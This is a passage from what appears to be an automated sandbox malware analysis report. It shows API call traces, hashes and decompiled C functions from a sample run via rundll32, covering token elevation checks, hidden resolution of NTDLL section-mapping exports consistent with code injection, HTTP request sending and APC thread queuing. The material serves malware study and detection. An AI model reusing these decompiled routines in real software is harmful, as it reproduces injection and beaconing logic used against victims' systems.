                           • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                          • String ID:
                          • API String ID: 186216982-0
                          • Opcode ID: 257b04280dd78a389ae519601324628dd4865599a159ab86f2306c536bf46590
                          • Instruction ID: 3af7fdd4846b9509dbce75f638cce570bb47c28110bcf25b7994587642280113
                          • Opcode Fuzzy Hash: 257b04280dd78a389ae519601324628dd4865599a159ab86f2306c536bf46590
                          • Instruction Fuzzy Hash: 94315E76900209EFEB22EFA4DC88EDEBBBCEB18304F104465F685E7151D7356A44CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B673EB: memset.NTDLL ref: 05B673F5
                          • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?), ref: 05B61381
                          • SetEvent.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B6138E
                          • Sleep.KERNEL32(00000BB8,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B61399
                          • ResetEvent.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B613A0
                          • CloseHandle.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B613A7
                          • GetShellWindow.USER32 ref: 05B613B2
                          • GetWindowThreadProcessId.USER32(00000000), ref: 05B613B9
                            • Part of subcall function 05B7B1DC: RegCloseKey.ADVAPI32(05B6E2A4), ref: 05B7B25F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                          • String ID:
                          • API String ID: 53838381-0
                          • Opcode ID: bf698264de8eca43353cfb7785e84d8e8399bcbff42de257ea5e1bf804f55f98
                          • Instruction ID: 0a73cdbf1e22db4cf236797b4c82d2b6265ea542477e3620f4ed95a499cae04a
                          • Opcode Fuzzy Hash: bf698264de8eca43353cfb7785e84d8e8399bcbff42de257ea5e1bf804f55f98
                          • Instruction Fuzzy Hash: 13218372715204BFC3216A6A9C4AE3F7FABEBCA620F149046F61A97540DF39B441C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01006C41(long* _a4) {
                          				long _v8;
                          				void* _v12;
                          				void _v16;
                          				long _v20;
                          				int _t33;
                          				void* _t46;
                          
                           				_v16 = 1; // default: report "elevated"
                           				_v20 = 0x2000; // default: SECURITY_MANDATORY_MEDIUM_RID
                           				if( *0x100a2fc > 5) { // global compared against 5; consistent with a Windows major-version check (integrity levels exist from Vista on)
                           					_v16 = 0;
                           					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // current process, TOKEN_READ
                           						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; class 0x14 = TokenElevation, yields TokenIsElevated
                           						_v8 = 0;
                           						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; class 0x19 = TokenIntegrityLevel, size query
                           						if(_v8 != 0) {
                           							_t46 = E01006D63(_v8); // heap allocation (RtlAllocateHeap, per the API list below)
                           							if(_t46 != 0) {
                           								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed; fills a TOKEN_MANDATORY_LABEL
                           								if(_t33 != 0) {
                           									// integrity RID = last sub-authority of the label SID (Label.Sid is the first member)
                           									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                           								}
                           								E01006C2C(_t46); // free
                           							}
                           						}
                           						CloseHandle(_v12);
                           					}
                           				}
                           				 *_a4 = _v20; // out: integrity level RID
                           				return _v16; // elevation flag
                          			}

                          APIs
                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01006C73
                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01006C93
                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01006CA3
                          • CloseHandle.KERNEL32(00000000), ref: 01006CF3
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01006CC6
                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01006CCE
                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01006CDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                           • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                          • String ID:
                          • API String ID: 1295030180-0
                          • Opcode ID: 8c9f8c1d706971555d62ed43e0692f879e780263627fe1f9bc5fdfd9f01c49db
                          • Instruction ID: 8639c6570e24a6e133752ed21685aedb210c9cedf01d918ed02d09847d2a4954
                          • Opcode Fuzzy Hash: 8c9f8c1d706971555d62ed43e0692f879e780263627fe1f9bc5fdfd9f01c49db
                          • Instruction Fuzzy Hash: AF212A75D0021DFFEB12DF94DD44EEEBBBAEB04304F0000A5FA50A6191D7769A54DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E01001D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _v8;
                          				intOrPtr _t9;
                          				intOrPtr _t13;
                          				char* _t19;
                          				char* _t28;
                          				void* _t33;
                          				void* _t34;
                          				char* _t36;
                          				void* _t38;
                          				intOrPtr* _t39;
                          				char* _t40;
                          				char* _t42;
                          				char* _t43;
                          
                          				_t34 = __edx;
                          				_push(__ecx);
                          				_t9 =  *0x100a348; // 0x428d5a8
                          				_t1 = _t9 + 0x100b624; // 0x253d7325
                          				_t36 = 0;
                          				_t28 = E0100624E(__ecx, _t1);
                          				if(_t28 != 0) {
                          					_t39 = __imp__;
                          					_t13 =  *_t39(_t28, _t38);
                          					_v8 = _t13;
                          					_t6 =  *_t39(_a4) + 1; // 0x52995b1
                          					_t40 = E01006D63(_v8 + _t6);
                          					if(_t40 != 0) {
                          						strcpy(_t40, _t28);
                          						_pop(_t33);
                          						__imp__(_t40, _a4);
                          						_t19 = E010024B3(_t33, _t34, _t40, _a8); // executed
                          						_t36 = _t19;
                          						E01006C2C(_t40);
                          						_t42 = E01005A07(StrTrimA(_t36, "="), _t36);
                          						if(_t42 != 0) {
                          							E01006C2C(_t36);
                          							_t36 = _t42;
                          						}
                          						_t43 = E01004162(_t36, _t33);
                          						if(_t43 != 0) {
                          							E01006C2C(_t36);
                          							_t36 = _t43;
                          						}
                          					}
                          					E01006C2C(_t28);
                          				}
                          				return _t36;
                          			}

                          APIs
                            • Part of subcall function 0100624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01001D4C,253D7325,00000000,00000000,?,75BCC740,010058D7), ref: 010062B5
                            • Part of subcall function 0100624E: sprintf.NTDLL ref: 010062D6
                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D5E
                          • lstrlen.KERNEL32(00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D66
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • strcpy.NTDLL ref: 01001D7D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 01001D88
                            • Part of subcall function 010024B3: lstrlen.KERNEL32(00000000,00000000,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 010024C4
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01001DA5
                            • Part of subcall function 01005A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,01001DB1,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01005A11
                            • Part of subcall function 01005A07: _snprintf.NTDLL ref: 01005A6F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                          • String ID: =
                          • API String ID: 2864389247-1428090586
                          • Opcode ID: 5a3b9ac98542252dfeb6a3266fd8114cb73c84ce1d67ebe065b690109b920119
                          • Instruction ID: 7aeb59c69f978a4d4de193c2103daa7ff69dc914424a684709616bd57f716c74
                          • Opcode Fuzzy Hash: 5a3b9ac98542252dfeb6a3266fd8114cb73c84ce1d67ebe065b690109b920119
                          • Instruction Fuzzy Hash: 2211C63390162667A7237B799C84CEF3AEE9E99654F064056FA8497180CF7ADD0187A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 01001F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,?,?,?,?,01003F35), ref: 01002047
                            • Part of subcall function 01005634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01005671
                            • Part of subcall function 01005634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010056A2
                          • SysAllocString.OLEAUT32(00000000), ref: 01003F61
                          • SysAllocString.OLEAUT32(0070006F), ref: 01003F75
                          • SysAllocString.OLEAUT32(00000000), ref: 01003F87
                          • SysFreeString.OLEAUT32(00000000), ref: 01003FEF
                          • SysFreeString.OLEAUT32(00000000), ref: 01003FFE
                          • SysFreeString.OLEAUT32(00000000), ref: 01004009
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                          • String ID:
                          • API String ID: 2831207796-0
                          • Opcode ID: b6f2c1810481f6745ba15b76afda8ff0600f23aa925a4374fd13070775bdb077
                          • Instruction ID: 1a3f5bb2ae4043239fea42d91fbd9d58293d2489bedd4944c142ff27c0a36013
                          • Opcode Fuzzy Hash: b6f2c1810481f6745ba15b76afda8ff0600f23aa925a4374fd13070775bdb077
                          • Instruction Fuzzy Hash: 97417132900609AFEB12DFFCD844AAEBBB9AF49310F14446AFA54EB160DA71D905CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32(?,?,80000000,00000001,?,05B860C0,00000018,05B64B2B,?,00000201,05B89A24,05B899DC,-0000000C,?), ref: 05B75843
                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,05B860C0,00000018,05B64B2B), ref: 05B758CE
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B758F7
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B75915
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                          • String ID:
                          • API String ID: 3666628472-0
                          • Opcode ID: b2ec186e616687c5908209c3c939795aab0a5ddfd2479d8a92eb15499044fcc5
                          • Instruction ID: 116f5eb4c62e7fa6c32ef0a5d861dc9e60f5c414d1cbc5b671da19eec2eb33c2
                          • Opcode Fuzzy Hash: b2ec186e616687c5908209c3c939795aab0a5ddfd2479d8a92eb15499044fcc5
                          • Instruction Fuzzy Hash: 80414F70A00709EFDB21DF65C8899ADBBF5FF08310B10859AE426E7290D774BA51CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,05B6C71A,05B6C71A,?,05B76EFA,?,05B6C71A,?,?,00000000), ref: 05B78F87
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FA9
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FBF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FD5
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B78FEB
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B79001
                            • Part of subcall function 05B6710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05B67167
                            • Part of subcall function 05B6710A: memset.NTDLL ref: 05B6718B
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                          • String ID:
                          • API String ID: 3012371009-0
                          • Opcode ID: fd338a14dc771a55dce8a9a58b7d62017cc24a4e3676885b1730b7b2338ffed8
                          • Instruction ID: b33a3c7c32b6317568f2360c14a46d9b111c6f3f06a49e246c14053fcc4a93a2
                          • Opcode Fuzzy Hash: fd338a14dc771a55dce8a9a58b7d62017cc24a4e3676885b1730b7b2338ffed8
                          • Instruction Fuzzy Hash: 7A21B0B061060AAFD721EFA9D895D7ABBEDFF05240B01506AF615CB201EB74FA05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010044DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _t1;
                          				intOrPtr _t2;
                          				intOrPtr _t5;
                          				intOrPtr _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t11;
                          				intOrPtr _t23;
                          				intOrPtr _t26;
                          				_Unknown_base(*)()* _t28;
                          				intOrPtr _t30;
                          				_Unknown_base(*)()* _t32;
                          				intOrPtr _t33;
                          				_Unknown_base(*)()* _t35;
                          				intOrPtr _t36;
                          				_Unknown_base(*)()* _t38;
                          				intOrPtr _t39;
                          				_Unknown_base(*)()* _t41;
                          				intOrPtr _t44;
                          				struct HINSTANCE__* _t48;
                          				intOrPtr _t54;
                          
                          				// Allocates a 0x20-byte context and fills it with resolved NTDLL exports.
                          				// Return value in _v8: 8 (ERROR_NOT_ENOUGH_MEMORY) on allocation failure,
                          				// 0x7f (ERROR_PROC_NOT_FOUND) when any export lookup fails.
                          				_t54 = E01006D63(0x20);
                          				if(_t54 == 0) {
                          					_v8 = 8;
                          				} else {
                          					// API name strings are addressed as fixed offsets from the value at 0x100a348;
                          					// the hex comments are the first four bytes of each string (0x4c44544e = "NTDL").
                          					_t23 =  *0x100a348; // 0x428d5a8
                          					_t1 = _t23 + 0x100b11a; // 0x4c44544e
                          					_t48 = GetModuleHandleA(_t1);
                          					_t26 =  *0x100a348; // 0x428d5a8
                          					_t2 = _t26 + 0x100b761; // 0x7243775a, name begins "ZwCr"
                          					_v8 = 0x7f;
                          					_t28 = GetProcAddress(_t48, _t2);
                          					 *(_t54 + 0xc) = _t28;
                          					if(_t28 == 0) {
                          						L8:
                          						E01006C2C(_t54);
                          					} else {
                          						_t30 =  *0x100a348; // 0x428d5a8
                          						_t5 = _t30 + 0x100b74e; // 0x614d775a, name begins "ZwMa"
                          						_t32 = GetProcAddress(_t48, _t5);
                          						 *(_t54 + 0x10) = _t32;
                          						if(_t32 == 0) {
                          							goto L8;
                          						} else {
                          							_t33 =  *0x100a348; // 0x428d5a8
                          							_t7 = _t33 + 0x100b771; // 0x6e55775a, name begins "ZwUn"
                          							_t35 = GetProcAddress(_t48, _t7);
                          							 *(_t54 + 0x14) = _t35;
                          							if(_t35 == 0) {
                          								goto L8;
                          							} else {
                          								_t36 =  *0x100a348; // 0x428d5a8
                          								_t9 = _t36 + 0x100b4ca; // 0x4e6c7452, name begins "RtlN"
                          								_t38 = GetProcAddress(_t48, _t9);
                          								 *(_t54 + 0x18) = _t38;
                          								if(_t38 == 0) {
                          									goto L8;
                          								} else {
                          									_t39 =  *0x100a348; // 0x428d5a8
                          									_t11 = _t39 + 0x100b786; // 0x6c43775a, name begins "ZwCl"
                          									_t41 = GetProcAddress(_t48, _t11);
                          									 *(_t54 + 0x1c) = _t41;
                          									if(_t41 == 0) {
                          										goto L8;
                          									} else {
                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                          										// E0100190C uses the table above; the API list below shows it reaching NtCreateSection.
                          										_t44 = E0100190C(_t54, _a8); // executed
                          										_v8 = _t44;
                          										if(_t44 != 0) {
                          											goto L8;
                          										} else {
                          											 *_a12 = _t54; // hand the filled context back to the caller
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _v8;
                          			}

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01004046,?,?,?,?,00000000,00000000), ref: 01004503
                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01004525
                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0100453B
                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01004551
                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01004567
                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0100457D
                            • Part of subcall function 0100190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0100459D), ref: 01001969
                            • Part of subcall function 0100190C: memset.NTDLL ref: 0100198B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                          • String ID:
                          • API String ID: 3012371009-0
                          • Opcode ID: b21124ff447fc6a2c5c39491a64b2e44d8a749c36e45558a2b3d34c5850b43cf
                          • Instruction ID: 7dd5c0af1360cdd7ba4598324e0b297254ca1589755764bbf2b5848017edc03b
                          • Opcode Fuzzy Hash: b21124ff447fc6a2c5c39491a64b2e44d8a749c36e45558a2b3d34c5850b43cf
                          • Instruction Fuzzy Hash: F421917060070ADFE722DF69C884E9ABBFCEF44201F054465F685C7651DB75E9088BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01006954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                          				void* __esi;
                          				void* _t9;
                          				long _t10;
                          				void* _t18;
                          				void* _t22;
                          
                          				_t9 = __eax;
                          				_t22 = __eax; // request context: +0x18 is the WinINet request handle, +0x1c/+0x20 are event handles
                          				if(_a4 != 0) {
                          					_t9 = E010045C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                          					if(_t9 == 0) {
                          						L9:
                          						return GetLastError();
                          					}
                          				}
                          				_t10 = E01007AF1(_t9, _t18, _t22, _a8); // executed
                          				if(_t10 == 0) {
                          					ResetEvent( *(_t22 + 0x1c));
                          					ResetEvent( *(_t22 + 0x20));
                          					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                          						SetEvent( *(_t22 + 0x1c));
                          						goto L7;
                          					} else {
                          						_t10 = GetLastError();
                          						if(_t10 == 0x3e5) { // ERROR_IO_PENDING: asynchronous send still in progress, treated as success
                          							L7:
                          							_t10 = 0;
                          						}
                          					}
                          				}
                          				if(_t10 == 0xffffffff) {
                          					goto L9;
                          				}
                          				return _t10;
                          			}

                          APIs
                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 0100698E
                          • ResetEvent.KERNEL32(?), ref: 01006993
                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010069A0
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 010069AB
                          • GetLastError.KERNEL32(?,?,00000102,010037A0,?,?,76CC81D0,00000000), ref: 010069C6
                            • Part of subcall function 010045C4: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0), ref: 010045D0
                            • Part of subcall function 010045C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01006973,?,?,?,?,00000102,010037A0,?), ref: 0100462E
                            • Part of subcall function 010045C4: lstrcpy.KERNEL32(00000000,00000000), ref: 0100463E
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 010069B9
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 3739416942-0
                          • Opcode ID: 1c16c56b3e75d2b3635120b577aa5fe84c47d7e8b35019363d78a09658dc2aa0
                          • Instruction ID: 9cc321a5b28896ee8c701400a1d77b5a4ea43c58e63e8faac9a37a9b897fa0b8
                          • Opcode Fuzzy Hash: 1c16c56b3e75d2b3635120b577aa5fe84c47d7e8b35019363d78a09658dc2aa0
                          • Instruction Fuzzy Hash: 6E01AD31104601AEEB33AB79ED44F9BBAEAAF84374F100624F5D5914E2C722E424DA20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,00000000,05B7893A,05B8A174,05B80998), ref: 05B773C1
                          • QueueUserAPC.KERNEL32(05B7893A,00000000,?,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773D6
                          • GetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773E1
                          • TerminateThread.KERNEL32(00000000,00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773EB
                          • CloseHandle.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773F2
                          • SetLastError.KERNEL32(00000000,?,05B7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 05B773FB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                          • String ID:
                          • API String ID: 3832013932-0
                          • Opcode ID: d69fd31f87f73460a4556f4b1cc745c7468f14c72527bf6c5361e51d400fa694
                          • Instruction ID: 5a4e9ff7e79c5b3ed1d76cfc1ffe16f44dde5d8c95a81a23ada29ab1aa5490e3
                          • Opcode Fuzzy Hash: d69fd31f87f73460a4556f4b1cc745c7468f14c72527bf6c5361e51d400fa694
                          • Instruction Fuzzy Hash: 13F0F832215221BBD7326BA0AC0AF7FBF6AFF09755F649404F61592190DF21B811DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E01003472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                          				signed int _v8;
                          				char _v12;
                          				signed int* _v16;
                          				char _v284;
                          				void* __esi;
                          				char* _t59;
                          				intOrPtr* _t60;
                          				void* _t62;
                          				intOrPtr _t64;
                          				char _t65;
                          				void* _t67;
                          				intOrPtr _t68;
                          				intOrPtr _t69;
                          				intOrPtr _t71;
                          				void* _t73;
                          				signed int _t81;
                          				void* _t91;
                          				void* _t92;
                          				char _t98;
                          				signed int* _t100;
                          				intOrPtr* _t101;
                          				void* _t102;
                          
                          				_t92 = __ecx;
                          				_v8 = _v8 & 0x00000000;
                          				_t98 = _a16;
                          				if(_t98 == 0) {
                          					__imp__( &_v284,  *0x100a3dc);
                          					_t91 = 0x80000002;
                          					L6:
                          					_t59 = E010061FC( &_v284,  &_v284);
                          					_a8 = _t59;
                          					if(_t59 == 0) {
                          						_v8 = 8;
                          						L29:
                          						_t60 = _a20;
                          						if(_t60 != 0) {
                          							 *_t60 =  *_t60 + 1;
                          						}
                          						return _v8;
                          					}
                          					_t101 = _a24;
                          					_t62 = E01006F28(_t92, _t97, _t101, _t91, _t59); // executed
                          					if(_t62 != 0) {
                          						L27:
                          						E01006C2C(_a8);
                          						goto L29;
                          					}
                          					_t64 =  *0x100a318; // 0x5299d70
                          					_t16 = _t64 + 0xc; // 0x5299e92
                          					_t65 = E010061FC(_t64,  *_t16);
                          					_a24 = _t65;
                          					if(_t65 == 0) {
                          						L14:
                          						_t29 = _t101 + 0x14; // 0x102
                          						_t33 = _t101 + 0x10; // 0x3d010090, executed
                          						_t67 = E01004822(_t97,  *_t33, _t91, _a8,  *0x100a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                          						if(_t67 == 0) {
                          							_t68 =  *0x100a348; // 0x428d5a8
                          							if(_t98 == 0) {
                          								_t35 = _t68 + 0x100ba4c; // 0x4d4c4b48
                          								_t69 = _t35;
                          							} else {
                          								_t34 = _t68 + 0x100ba47; // 0x55434b48
                          								_t69 = _t34;
                          							}
                          							if(E010062F6(_t69,  *0x100a3d4,  *0x100a3d8,  &_a24,  &_a16) == 0) {
                          								if(_t98 == 0) {
                          									_t71 =  *0x100a348; // 0x428d5a8
                          									_t44 = _t71 + 0x100b842; // 0x74666f53
                          									_t73 = E010061FC(_t44, _t44);
                          									_t99 = _t73;
                          									if(_t73 == 0) {
                          										_v8 = 8;
                          									} else {
                          										_t47 = _t101 + 0x10; // 0x3d010090
                          										E010074B6( *_t47, _t91, _a8,  *0x100a3d8, _a24);
                          										_t49 = _t101 + 0x10; // 0x3d010090
                          										E010074B6( *_t49, _t91, _t99,  *0x100a3d0, _a16);
                          										E01006C2C(_t99);
                          									}
                          								} else {
                          									_t40 = _t101 + 0x10; // 0x3d010090, executed
                          									E010074B6( *_t40, _t91, _a8,  *0x100a3d8, _a24); // executed
                          									_t43 = _t101 + 0x10; // 0x3d010090, executed
